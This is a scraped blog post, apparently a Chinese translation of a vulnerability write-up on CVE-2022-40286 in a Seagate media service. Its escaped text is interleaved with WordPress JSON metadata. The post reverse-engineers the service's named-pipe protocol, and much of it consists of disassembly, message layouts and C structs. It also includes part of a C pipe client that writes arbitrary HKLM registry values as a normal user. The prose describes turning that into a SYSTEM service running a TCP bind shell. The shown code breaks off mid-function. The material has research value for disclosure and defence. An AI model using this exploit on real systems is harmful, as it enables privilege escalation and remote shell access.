![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-8.png\")
<\/figure>\n\n\n\n\u8be5\u5de5\u5177\u8fd8\u5b89\u88c5\u4e86\u4e00\u4e2a UI \u7a0b\u5e8f\uff0c\u8be5\u7a0b\u5e8f\u4e0e\u4ea4\u4e92\u5f0f\u7528\u6237\u5728\u540c\u4e00\u4f1a\u8bdd\u4e2d\u8fd0\u884c\uff1a<\/p>\n\n\n\n \u7279\u6743\u63d0\u5347\u7684\u5e38\u89c1\u653b\u51fb\u5411\u91cf\u59cb\u4e8e\u4f4e\u7279\u6743\u8fdb\u7a0b (UI) \u548c\u9ad8\u7279\u6743\u670d\u52a1\uff08\u6216\u9a71\u52a8\u7a0b\u5e8f\uff09\u4e4b\u95f4\u7684\u5185\u90e8\u901a\u4fe1\u3002\u8c03\u67e5\u6b64\u95ee\u9898\u7684\u7b2c\u4e00\u6b65\u662f\u4ece\u6211\u4eec\u53ef\u4ee5\u76d1\u63a7\u7684 UI \u4e2d\u89e6\u53d1\u5408\u6cd5\u901a\u4fe1\u3002\u4e0d\u5e78\u7684\u662f\uff0cUI \u7a0b\u5e8f\u4ec5\u63d0\u4f9b\u975e\u5e38\u6709\u9650\u7684\u529f\u80fd\uff0c\u56e0\u4e3a\u6211\u6ca1\u6709\u76f8\u5e94\u7684 Seagate \u786c\u4ef6\uff1a<\/p>\n\n\n\n Process Explorer \u663e\u793a\u8be5\u670d\u52a1\u5305\u542b\u540d\u4e3aMEDIA_AGGRE_PIPE.PIP\u7684\u547d\u540d\u7ba1\u9053\u7684\u53e5\u67c4- \u6211\u6000\u7591\u8be5\u7ba1\u9053\u7528\u4e8e\u901a\u4fe1UI ( stxmediamanager.exe ) \u548c\u670d\u52a1 ( MediaAggreService.exe )\u3002<\/p>\n\n\n\n \u56de\u987e UI\uff0c\u6211\u4eec\u53ef\u4ee5\u5355\u51fb\u7684\u552f\u4e00\u6309\u94ae\u4f3c\u4e4e\u662f\u201c\u5237\u65b0\u201d\u2014\u2014\u5e0c\u671b\u8fd9\u4f1a\u89e6\u53d1\u4e00\u4e9b\u4e0e\u6211\u4eec\u53ef\u4ee5\u76d1\u63a7\u7684\u670d\u52a1\u7684\u901a\u4fe1\u3002\u6211\u4eec\u53ef\u4ee5\u5c06\u8c03\u8bd5\u5668\u9644\u52a0\u5230 UI \u8fdb\u7a0b\u5e76\u5728CreateFile\u548cWriteFile\u51fd\u6570\u4e0a\u8bbe\u7f6e\u65ad\u70b9\u4ee5\u786e\u8ba4\u8fd9\u4e00\u7406\u8bba\uff1a<\/p>\n\n\n\n \u5982\u4e0a\u6240\u793a\uff0c\u5f53\u5355\u51fb\u201c\u5237\u65b0\u201d\u65f6\uff0cUI \u8fdb\u7a0b\u4f7f\u7528CreateFile\u6253\u5f00\u5230\u547d\u540d\u7ba1\u9053\u7684\u8fde\u63a5\u3002\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u68c0\u67e5\u5bf9WriteFile\u7684\u540e\u7eed\u8c03\u7528\u6765\u8bb0\u5f55\u6d88\u606f\u6570\u636e\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n \u5199\u5165\u6570\u636e\u5757#1<\/strong>\uff1a<\/p>\n\n\n\n \u5199\u5165\u6570\u636e\u5757#2<\/strong>\uff1a<\/p>\n\n\n\n \u6709\u6839\u636e\u7684\u731c\u6d4b\u544a\u8bc9\u6211\uff0c\u7b2c\u4e00\u6761\u6d88\u606f\u662f\u4e00\u4e2a 4 \u5b57\u8282\u957f\u5ea6\u7684\u5b57\u6bb5\uff0c\u8868\u793a\u6d88\u606f\u6b63\u6587\u7684\u5927\u5c0f\u3002\u7b2c\u4e8c\u6761\u6d88\u606f\u5305\u542b\u5b9e\u9645\u7684\u547d\u4ee4\u6570\u636e\u3002\u5728\u6b64\u793a\u4f8b\u4e2d\uff0c\u5b83\u6b63\u5728\u53d1\u9001\u4e00\u6761\u6d88\u606f\u6b63\u6587\u957f\u5ea6\u4e3a 8 \u5b57\u8282\u7684\u547d\u4ee4 – \u521d\u59cb 4 \u5b57\u8282\u957f\u5ea6\u503c\u4e0e\u9884\u671f\u7684\u7b2c\u4e8c\u4e2aWriteFile\u8c03\u7528\u7684nNumberOfBytesToWrite\u53c2\u6570\u5339\u914d\u3002\u6211\u4eec\u73b0\u5728\u53ef\u4ee5\u68c0\u67e5\u670d\u52a1\u8fdb\u7a0b\u4e2d\u7684\u63a5\u6536\u7aef\u3002\u5728MediaAggreService.exe\u4e2d\u7684ConnectNamedPipe\u51fd\u6570\u4e0a\u8bbe\u7f6e\u65ad\u70b9\u5e94\u8be5\u5728 UI \u5ba2\u6237\u7aef\u8c03\u7528CreateFile\u65f6\u89e6\u53d1\uff1a \u6211\u4eec\u73b0\u5728\u53ef\u4ee5\u5728ReadFile\u4e0a\u8bbe\u7f6e\u65ad\u70b9<\/p>\n\n\n\n \u529f\u80fd\u3002\u8fd9\u663e\u793a\u4e86\u4e0e\u9884\u671f\u4e00\u6837\u4ece\u5ba2\u6237\u7aef\u53d1\u9001\u7684\u6570\u636e\uff1a<\/p>\n\n\n\n \u73b0\u5728\u6211\u4eec\u5df2\u7ecf\u5728\u670d\u52a1\u4e2d\u627e\u5230\u4e86\u8bfb\u53d6\u547d\u4ee4\u6570\u636e\u7684\u4ee3\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u6309\u7167\u6267\u884c\u6d41\u7a0b\u67e5\u770b\u63a5\u4e0b\u6765\u4f1a\u53d1\u751f\u4ec0\u4e48\u3002\u7531\u4e8e\u6211\u4eec\u53ea\u80fd\u8bbf\u95ee UI \u4e2d\u7684\u5355\u4e2a\u201c\u5237\u65b0\u201d\u547d\u4ee4\uff0c\u56e0\u6b64\u9700\u8981\u8fdb\u884c\u4e00\u4e9b\u9759\u6001\u5206\u6790\u4ee5\u67e5\u770b\u53ef\u7528\u7684\u5176\u4ed6\u547d\u4ee4\u3002<\/p>\n\n\n\n \u5728\u82b1\u4e86\u4e00\u4e9b\u65f6\u95f4\u5206\u6790\u4ee3\u7801\u4e4b\u540e\uff0c\u6211\u53ef\u4ee5\u770b\u5230\u6bcf\u4e2a\u547d\u4ee4\u90fd\u4ee5 16 \u4f4d\u7b7e\u540d ( 0x4B5C ) \u5f00\u5934\u3002\u5176\u540e\u662f 16 \u4f4d\u201c\u4e3b\u8981\u201d\u547d\u4ee4 ID\uff0c\u7136\u540e\u662f 32 \u4f4d\u201c\u6b21\u8981\u201d\u547d\u4ee4 ID\u3002\u6bcf\u4e2a\u201c\u4e3b\u8981\u201d\u547d\u4ee4 ID \u90fd\u671d\u7740\u4e0d\u540c\u7684 switch \u8bed\u53e5\u524d\u8fdb\u2014\u2014\u6211\u5728\u4e0b\u9762\u8bc4\u8bba\u4e86\u53cd\u6c47\u7f16\uff1a<\/p>\n\n\n\n \u5982\u4e0a\u6240\u793a\uff0c\u8be5\u670d\u52a1\u4f3c\u4e4e\u53ea\u652f\u6301 2 \u4e2a\u201c\u4e3b\u8981\u201d\u547d\u4ee4 ID – 0x10\u548c0x20\u3002\u8003\u8651\u5230\u8fd9\u4e9b\u4fe1\u606f\uff0c\u6211\u4eec\u73b0\u5728\u53ef\u4ee5\u89e3\u7801\u6211\u4eec\u4e4b\u524d\u8bb0\u5f55\u7684\u539f\u59cb\u201c\u5237\u65b0\u201d\u547d\u4ee4\uff1a<\/p>\n\n\n\n \u5728\u5feb\u901f\u67e5\u770b\u4e24\u4e2a\u4e3b\u8981\u547d\u4ee4\u7ec4\u7684\u4ee3\u7801\u540e\uff0c\u6211\u6ce8\u610f\u52300x10\u547d\u4ee4\u7ec4\u5305\u542b\u4e00\u4e2a\u8c03\u7528\u540d\u4e3aMXOSRVSetRegKey\u7684\u5185\u90e8\u51fd\u6570\u7684\u6761\u76ee\u3002\u8be5\u6761\u76ee\u7684\u201c\u6b21\u8981\u201d\u547d\u4ee4 ID \u4e3a0x400\u3002<\/p>\n\n\n\n \u987e\u540d\u601d\u4e49\uff0cMXOSRVSetRegKey\u51fd\u6570\u4f3c\u4e4e\u8bbe\u7f6e\u4e86\u4e00\u4e2a\u6ce8\u518c\u8868\u503c\uff0c\u5982\u679c\u8be5\u952e\u4e0d\u5b58\u5728\uff0c\u5219\u9996\u5148\u521b\u5efa\u5b83\u3002<\/p>\n\n\n\n \u5bf9\u8be5\u4ee3\u7801\u7684\u521d\u6b65\u5206\u6790\u8868\u660e\uff0c\u8be5\u547d\u4ee4\u53ef\u80fd\u5141\u8bb8\u6211\u4eec\u901a\u8fc7\u5ba2\u6237\u7aef\u8fdb\u7a0b\u8fdc\u7a0b\u521b\u5efa\/\u4fee\u6539\u6ce8\u518c\u8868\u5b57\u7b26\u4e32\u503c\u3002\u57fa\u672c\u5bc6\u94a5\u4f3c\u4e4e\u88ab\u786c\u7f16\u7801\u4e3aHKEY_LOCAL_MACHINE\uff08\u5728RegCreateKeyExW\u8c03\u7528\u4e2d\u63a8\u9001 0x80000002 \uff09\u3002\u5bf9\u8fd9\u4e9b\u51fd\u6570\u8fdb\u884c\u9006\u5411\u5de5\u7a0b\u540e\uff0c\u6211\u53ef\u4ee5\u770b\u5230\u8be5\u547d\u4ee4\u671f\u671b\u63a5\u6536\u4ee5\u4e0b\u683c\u5f0f\u7684\u6d88\u606f\u6570\u636e\uff1a<\/p>\n\n\n\n \u4e0a\u9762\u7684\u547d\u4ee4\u53ea\u652f\u6301\u5b57\u7b26\u4e32\u503c\u2014\u2014\u7c7b\u578b\u5b57\u6bb5\u88ab\u786c\u7f16\u7801\u4e3aREG_SZ\uff08\u5728RegSetValueExW\u8c03\u7528\u4e2d\u6309 1 \uff09\u3002 \u6211\u8fd8\u53d1\u73b0\u4e86\u53e6\u4e00\u4e2a\u547d\u4ee4 ID ( 0x410 )\uff0c\u5b83\u5141\u8bb8\u6211\u4eec\u4ee5\u76f8\u540c\u7684\u65b9\u5f0f\u8bbe\u7f6eREG_DWORD\u503c\u3002\u6b64\u547d\u4ee4\u63a5\u6536\u4ee5\u4e0b\u683c\u5f0f\u7684\u6d88\u606f\u6570\u636e\uff1a<\/p>\n\n\n\n \u4ece\u4e0a\u9762\u547d\u4ee4\u6570\u636e\u7684\u5e03\u5c40\u6211\u4eec\u53ef\u4ee5\u770b\u51fa\uff0c\u6211\u4eec\u53ef\u4ee5\u63a8\u65ad\u8fd9\u4e24\u4e2a\u547d\u4ee4\u5171\u4eab\u4e00\u4e2a\u5171\u540c\u7684\u6570\u636e\u7ed3\u6784\u3002\u6211\u4eec\u53ef\u4ee5\u7528 C \u7ed3\u6784\u6765\u8868\u793a\u5b83\u4eec\uff0c\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n \u5047\u8bbe\u4ee5\u4e0a\u6240\u6709\u5185\u5bb9\u90fd\u662f\u6b63\u786e\u7684\uff0c\u8fd9\u610f\u5473\u7740\uff0c\u6b63\u5982\u6000\u7591\u7684\u90a3\u6837\uff0c\u4efb\u4f55\u7528\u6237\u90fd\u53ef\u4ee5\u901a\u8fc7\u5411\u5e0c\u6377\u670d\u52a1\u7ba1\u9053\u53d1\u9001\u547d\u4ee4\u6765\u5c06\u4efb\u610f\u6ce8\u518c\u8868\u503c\u5199\u5165HKEY_LOCAL_MACHINE\u4e2d\u7684\u4efb\u4f55\u952e\u3002\u5982\u679c\u8fd9\u662f\u771f\u7684\uff0c\u8fd9\u610f\u5473\u7740\u6211\u4eec\u6709\u4e00\u6761\u660e\u786e\u7684\u5229\u7528\u9014\u5f84\u3002\u8fd9\u53ef\u80fd\u770b\u8d77\u6765\u5f88\u5947\u602a\uff0c\u4f46\u662f\u50cf\u8fd9\u6837\u7684\u201c\u529f\u80fd\u201d\u6bd4\u60a8\u60f3\u8c61\u7684\u8981\u666e\u904d\u5f97\u591a\u3002<\/p>\n\n\n\n \u6211\u4eec\u73b0\u5728\u6709\u8db3\u591f\u7684\u4fe1\u606f\u6765\u7f16\u5199\u81ea\u5b9a\u4e49\u7ba1\u9053\u5ba2\u6237\u7aef\u6765\u6d4b\u8bd5\u6211\u4eec\u7684\u7406\u8bba\uff1a<\/p>\n\n\n\n \u4e0a\u9762\u7684\u4ee3\u7801\u8fde\u63a5\u5230MEDIA_AGGRE_PIPE.PIP\u7ba1\u9053\u5e76\u5c1d\u8bd5\u5728HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\x86matthew\u4e2d\u521b\u5efa\u4e00\u4e2a\u6ce8\u518c\u8868\u503c- \u6211\u4eec\u5c06\u4f5c\u4e3a\u666e\u901a\u7528\u6237\u6267\u884c\u8fd9\u4e2a\u7a0b\u5e8f\uff1a<\/p>\n\n\n\n \u6b63\u5982\u6211\u4eec\u5728\u4e0a\u9762\u770b\u5230\u7684\uff0c\u8fd9\u6bb5\u4ee3\u7801\u6b63\u5e38\u5de5\u4f5c\u5e76\u521b\u5efa\u4e86\u76ee\u6807\u6ce8\u518c\u8868\u503c\u3002\u5177\u6709\u5199\u5165HKEY_LOCAL_MACHINE\u7684\u80fd\u529b\u4e3a\u5229\u7528\u63d0\u4f9b\u4e86\u5f88\u591a\u53ef\u80fd\u6027 – \u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u5c06\u901a\u8fc7\u5411HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\u6ce8\u518c\u8868\u9879\u6dfb\u52a0\u4e00\u4e2a\u6761\u76ee\u6765\u521b\u5efa\u81ea\u5b9a\u4e49\u670d\u52a1\u3002<\/p>\n\n\n\n \u800c\u4e0d\u662f\u90e8\u7f72\u5355\u72ec\u7684 exe \u4ee5\u7528\u4f5cSYSTEM\u670d\u52a1\u8d1f\u8f7d\uff0c\u6211\u4eec\u5c06\u628a\u8fd9\u4e2a\u529f\u80fd\u7ed3\u5408\u5230\u4e3b\u8981\u7684\u6f0f\u6d1e\u5229\u7528\u53ef\u6267\u884c\u6587\u4ef6\u4e2d\u3002exe \u5c06\u9996\u5148\u68c0\u67e5\u5b83\u662f\u5426\u4ee5SYSTEM\u7528\u6237\u8eab\u4efd\u8fd0\u884c – \u5982\u679c\u4e0d\u662f\uff0c\u5b83\u5c06\u6267\u884c\u9ed8\u8ba4\u884c\u4e3a\u5e76\u5c1d\u8bd5\u901a\u8fc7 Seagate \u7ba1\u9053\u521b\u5efa\u65b0\u670d\u52a1\uff0c\u5982\u4e0a\u6240\u8ff0\u3002\u5426\u5219\uff0c\u5982\u679c exe \u68c0\u6d4b\u5230\u5b83\u4f5c\u4e3aSYSTEM\u670d\u52a1\u8fd0\u884c\uff0c\u5b83\u5c06\u90e8\u7f72\u4e3b\u8981\u6709\u6548\u8d1f\u8f7d – \u8fd9\u5c06\u521b\u5efa\u4e00\u4e2a TCP \u7ed1\u5b9a\u5916\u58f3\u7528\u4e8e\u6f14\u793a\u76ee\u7684\u3002<\/p>\n\n\n\n \u603b\u800c\u8a00\u4e4b\uff0c\u5229\u7528\u6982\u5ff5\u9a8c\u8bc1\u5de5\u5177\u5c06\u6267\u884c\u4ee5\u4e0b\u6b65\u9aa4\uff1a <\/p>\n\n\n\n <\/p>\n\n\n\n 1.\u4f7f\u7528CreateFile\u901a\u8fc7\u547d\u540d\u7ba1\u9053\\.\\pipe\\MEDIA_AGGRE_PIPE.PIP\u8fde\u63a5\u5230\u5e0c\u6377\u670d\u52a1\u3002<\/p>\n\n\n\n 2.\u4f7f\u7528GetModuleFileName \u83b7\u53d6\u5f53\u524dexe\u7684\u6587\u4ef6\u8def\u5f84. \u6f14\u793a<\/strong> \u6267\u884c\u6f0f\u6d1e\u5229\u7528\uff1a<\/p>\n\n\n\n \u91cd\u542f\u540e\uff1a<\/p>\n\n\n\n \u8fde\u63a5\u5230localhost:1234\uff1a<\/p>\n\n\n\n \u4f5c\u4e3a\u53c2\u8003\uff0c\u6b64\u6f0f\u6d1e\u5df2\u5206\u914d\u7ed9 CVE-2022-40286\u3002<\/p>\n\n\n\n \u5b8c\u6574\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n \u8fd9\u7bc7\u6587\u7ae0\u6db5\u76d6\u7684\u4e3b\u9898\u4e0e\u6211\u901a\u5e38\u7684\u5185\u5bb9\u7565\u6709\u4e0d\u540c\uff1a\u5e94\u7528\u7a0b\u5e8f\u6f0f\u6d1e\u53d1\u73b0\u548c\u6f0f\u6d1e\u5229\u7528\u5f00\u53d1\u3002 \u539f\u6587\u94fe\u63a5\uff1ahttps:\/\/www. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[45,37,43],"tags":[],"class_list":["post-627","post","type-post","status-publish","format-standard","hentry","category-x86matthew-com","category-samples","category-infoarticle"],"views":2297,"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=627"}],"version-history":[{"count":2,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/627\/revisions"}],"predecessor-version":[{"id":648,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/627\/revisions\/648"}],"wp:attachment":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=627"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=627"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-9.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-10.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-11.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-12.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-13.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-14.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-15.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-16.png\")
<\/figure>\n\n\n\n001145BB | BA 5C4B0000 | mov edx,4B5C | set expected command header signature: 0x4B5C\n001145C0 | 0FB708 | movzx ecx,word ptr ds:[eax] | get actual command header signature value\n001145C3 | 66:3BCA | cmp cx,dx | check 16-bit signature value\n001145C6 | 74 1A | je mediaaggreservice.1145E2 | jump if signature matches\n001145C8 | 51 | push ecx |\n001145C9 | 68 D8391200 | push mediaaggreservice.1239D8 | \"[PIPE] Failure: Bad Signature 0x%X\"\n001145CE | 68 F0841400 | push mediaaggreservice.1484F0 |\n001145D3 | E8 D866FFFF | call mediaaggreservice.10ACB0 | add_log_entry\n001145D8 | 83C4 0C | add esp,C |\n001145DB | 33C0 | xor eax,eax |\n001145DD | 5E | pop esi |\n001145DE | 8BE5 | mov esp,ebp |\n001145E0 | 5D | pop ebp |\n001145E1 | C3 | ret | error, return\n001145E2 | 57 | push edi |\n001145E3 | FF70 04 | push dword ptr ds:[eax+4] | log minor command ID (32-bit)\n001145E6 | 0FB740 02 | movzx eax,word ptr ds:[eax+2] | log major command ID (16-bit)\n001145EA | 50 | push eax |\n001145EB | 68 203A1200 | push mediaaggreservice.123A20 | \"[PIPE] Command major\/minor: [0x%X:0x%X]\"\n001145F0 | 68 F0841400 | push mediaaggreservice.1484F0 |\n001145F5 | E8 7667FFFF | call mediaaggreservice.10AD70 | add_log_entry\n001145FA | 8B86 D0F00100 | mov eax,dword ptr ds:[esi+1F0D0] |\n00114600 | C745 F8 00000000 | mov dword ptr ss:[ebp-8],0 |\n00114607 | 0FB740 02 | movzx eax,word ptr ds:[eax+2] | get major command value (message_base + 0x2)\n0011460B | 83C4 10 | add esp,10 |\n0011460E | 83F8 10 | cmp eax,10 | check if the major command value is 0x10\n00114611 | 74 60 | je mediaaggreservice.114673 | jump to 0x10 command switch\n00114613 | 83F8 20 | cmp eax,20 | check if the major command value is 0x20\n00114616 | 74 1A | je mediaaggreservice.114632 | jump to 0x20 command switch\n00114618 | 68 C83A1200 | push mediaaggreservice.123AC8 | \"[PIPE] Failure: Unknown Major Command\"\n0011461D | 68 F0841400 | push mediaaggreservice.1484F0 |\n00114622 | E8 8966FFFF | call mediaaggreservice.10ACB0 | add_log_entry\n<\/code><\/pre>\n\n\n\nHeader Length: 0x8\n0x0000 -> Signature (0x4B5C)\n0x0002 -> Major Command ID (0x10)\n0x0004 -> Minor Command ID (0x1)\n\n(no message body)<\/code><\/pre>\n\n\n\n001136E4 | 68 08300000 | push 3008 | total message length\n001136E9 | 8D47 08 | lea eax,dword ptr ds:[edi+8] |\n001136EC | 50 | push eax |\n001136ED | 8DB3 C0A90100 | lea esi,dword ptr ds:[ebx+1A9C0] |\n001136F3 | 56 | push esi |\n001136F4 | E8 5F560000 | call <JMP.&memcpy> | copy command message body\n001136F9 | FFB3 C0D90100 | push dword ptr ds:[ebx+1D9C0] |\n001136FF | 8D83 C0C90100 | lea eax,dword ptr ds:[ebx+1C9C0] |\n00113705 | 50 | push eax |\n00113706 | 8D83 C0B90100 | lea eax,dword ptr ds:[ebx+1B9C0] |\n0011370C | 50 | push eax |\n0011370D | 56 | push esi |\n0011370E | FF15 68D31100 | call dword ptr ds:[<&?MXOSRVSetRegKey@@YAHPA_W00H@Z>] | execute command<\/code><\/pre>\n\n\n\n70F25590 | 55 | push ebp |\n70F25591 | 8BEC | mov ebp,esp |\n70F25593 | 83EC 08 | sub esp,8 |\n70F25596 | 8D45 F8 | lea eax,dword ptr ss:[ebp-8] |\n70F25599 | 50 | push eax |\n70F2559A | 8D45 FC | lea eax,dword ptr ss:[ebp-4] |\n70F2559D | 50 | push eax |\n70F2559E | 6A 00 | push 0 |\n70F255A0 | 68 3F000F00 | push F003F |\n70F255A5 | 6A 00 | push 0 |\n70F255A7 | 68 6823F370 | push stxmediadevif.70F32368 |\n70F255AC | 6A 00 | push 0 |\n70F255AE | FF75 08 | push dword ptr ss:[ebp+8] |\n70F255B1 | C745 FC 00000000 | mov dword ptr ss:[ebp-4],0 |\n70F255B8 | 68 02000080 | push 80000002 |\n70F255BD | FF15 1020F370 | call dword ptr ds:[<&RegCreateKeyExW>] |\n70F255C3 | 85C0 | test eax,eax |\n70F255C5 | 75 1E | jne stxmediadevif.70F255E5 |\n70F255C7 | FF75 14 | push dword ptr ss:[ebp+14] |\n70F255CA | FF75 10 | push dword ptr ss:[ebp+10] |\n70F255CD | 6A 01 | push 1 |\n70F255CF | 50 | push eax |\n70F255D0 | FF75 0C | push dword ptr ss:[ebp+C] |\n70F255D3 | FF75 FC | push dword ptr ss:[ebp-4] |\n70F255D6 | FF15 0420F370 | call dword ptr ds:[<&RegSetValueExW>] |\n70F255DC | FF75 FC | push dword ptr ss:[ebp-4] |\n70F255DF | FF15 0020F370 | call dword ptr ds:[<&RegCloseKey>] |\n70F255E5 | 33C0 | xor eax,eax |\n70F255E7 | 8BE5 | mov esp,ebp |\n70F255E9 | 5D | pop ebp |\n70F255EA | C3 | ret |<\/code><\/pre>\n\n\n\nHeader Length: 0x8\n0x0000 -> Signature (0x4B5C)\n0x0002 -> Major Command ID (0x10)\n0x0004 -> Minor Command ID (0x400)\n\nMessage Length: 0x3008\n0x0000 -> Registry Key Path (wide-char)\n0x1000 -> Value Name (wide-char)\n0x2000 -> Value (wide-char)\n0x3000 -> Value Length (DWORD)\n0x3004 -> (Unused)<\/code><\/pre>\n\n\n\nHeader Length: 0x8\n0x0000 -> Signature (0x4B5C)\n0x0002 -> Major Command ID (0x10)\n0x0004 -> Minor Command ID (0x410)\n\nMessage Length: 0x3008\n0x0000 -> Registry Key Path (wide-char)\n0x1000 -> Value Name (wide-char)\n0x2000 -> (Unused)\n0x3000 -> (Unused)\n0x3004 -> Value (DWORD)\n<\/code><\/pre>\n\n\n\n\/\/ reverse-engineered seagate command header\nstruct SeagateCommandHeaderStruct\n{\n\tWORD wSignature;\n\tWORD wMajorCommandID;\n\tDWORD dwMinorCommandID;\n};\n\n\/\/ reverse-engineered seagate registry command data\nstruct SeagateRegistryCommandDataStruct\n{\n\twchar_t wszKeyPath[2048];\n\twchar_t wszValueName[2048];\n\twchar_t wszValueString[2048];\n\tDWORD dwValueStringLength;\n\tDWORD dwDwordValue;\n};\n<\/code><\/pre>\n\n\n\nDWORD SendSeagateCommand(WORD wMajorCommandID, DWORD dwMinorCommandID, BYTE *pCommandData, DWORD dwCommandDataLength)\n{\n\tHANDLE hPipe = NULL;\n\tDWORD dwBytesWritten = 0;\n\tDWORD dwDataLength = 0;\n\tSeagateCommandHeaderStruct SeagateCommandHeader;\n\tBYTE *pDataBlock = NULL;\n\n\t\/\/ open seagate media sync pipe\n\thPipe = CreateFile(\"\\\\\\\\.\\\\pipe\\\\MEDIA_AGGRE_PIPE.PIP\", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\n\tif(hPipe == INVALID_HANDLE_VALUE)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ initialise command header\n\tmemset((void*)&SeagateCommandHeader, 0, sizeof(SeagateCommandHeader));\n\tSeagateCommandHeader.wSignature = 0x4B5C;\n\tSeagateCommandHeader.wMajorCommandID = wMajorCommandID;\n\tSeagateCommandHeader.dwMinorCommandID = dwMinorCommandID;\n\n\t\/\/ calculate total data length\n\tdwDataLength = sizeof(SeagateCommandHeader) + dwCommandDataLength;\n\n\t\/\/ write data length to pipe\n\tif(WriteFile(hPipe, (void*)&dwDataLength, sizeof(dwDataLength), &dwBytesWritten, NULL) == 0)\n\t{\n\t\tCloseHandle(hPipe);\n\t\treturn 1;\n\t}\n\n\t\/\/ allocate buffer to combine the command header and data\n\tpDataBlock = (BYTE*)malloc(dwDataLength);\n\tif(pDataBlock == NULL)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ copy the header and data into the data buffer\n\tmemcpy((void*)pDataBlock, (void*)&SeagateCommandHeader, sizeof(SeagateCommandHeader));\n\tmemcpy((void*)((BYTE*)pDataBlock + sizeof(SeagateCommandHeader)), (void*)pCommandData, dwCommandDataLength);\n\n\t\/\/ write the message to the pipe\n\tif(WriteFile(hPipe, (void*)pDataBlock, 